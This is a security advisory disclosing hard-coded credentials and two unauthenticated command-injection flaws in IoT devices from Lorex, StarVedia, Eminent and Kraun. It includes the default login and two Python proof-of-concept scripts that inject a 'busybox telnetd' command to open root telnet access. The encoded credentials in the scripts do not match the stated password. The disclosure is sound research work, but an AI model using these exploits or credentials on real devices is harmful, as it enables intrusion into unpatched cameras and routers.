SSD Advisory – Multiple IoT Vendors – Multiple Vulnerabilities

Vulnerabilities summary
The following advisory describes three (3) vulnerabilities found in the following vendors:

  • Lorex
  • StarVedia
  • Eminent
  • Kraun

The vulnerabilities found:

  • Hard-coded credentials
  • Remote command injection (2)

It is possible to chain the vulnerabilities and to achieve unauthenticated remote command execution.
Credit
An independent security researcher, Robert Kugler (https://www.s3cur3.it), has reported this vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
We tried to contact Lorex, Kraun and Eminent, attempts to establish contact went unanswered, therefore no details have been provided on a solution or a workaround.
StarVedia were informed of the vulnerabilities and released patches to address them – “These two issues were fixed before your contacting us”

Vulnerabilities details
Hard-coded credentials
Default users that can be used to log in in the router’s website is: “supervisor”, with the password “dangerous”
Remote command injection (1)
User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to wlanset.cgi with malicious ‘SSID’ parameter.
Proof of Concept

#!/usr/bin/python
import requests
import os
import time
print "Unauthenticated Remote Code Execution"
url = 'http://VICTIM-IP/cgi-bin/wlanset.cgi' # Adjust IP address
payload = {'WiFiEnable': '1','SSID':'`/bin/busybox telnetd`','SECUNONE':'1','WIFITEST':'WiFi+test'}
headers = { "Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==", "Content-type": "application/x-www-form-urlencoded"}
r = requests.post(url, data=payload, headers=headers)
time.sleep(5)
print "\nTry to connect to your target via telnet and use the user name root."

Remote command injection (2)
User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to smtpset.cgi with malicious ‘SMTPSERVER’ parameter.
Proof of Concept

#!/usr/bin/python
import requests
import os
import time
print "Unauthenticated Remote Code Execution"
url = 'http://VICTIM-IP/cgi-bin/smtpset.cgi' # Adjust IP address
payload = {'UseUserDefined': '1','SMTPSERVER':'`/bin/busybox telnetd`','SMTPPORT':'25','SMTPNAME':'','SMTPPASSWD':'','SMTPTEST':'SMTP+server+test'}
headers = { "Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==", "Content-type": "application/x-www-form-urlencoded"}
r = requests.post(url, data=payload, headers=headers)
time.sleep(5)
print "\nTry to connect to your target via telnet and use the user name root."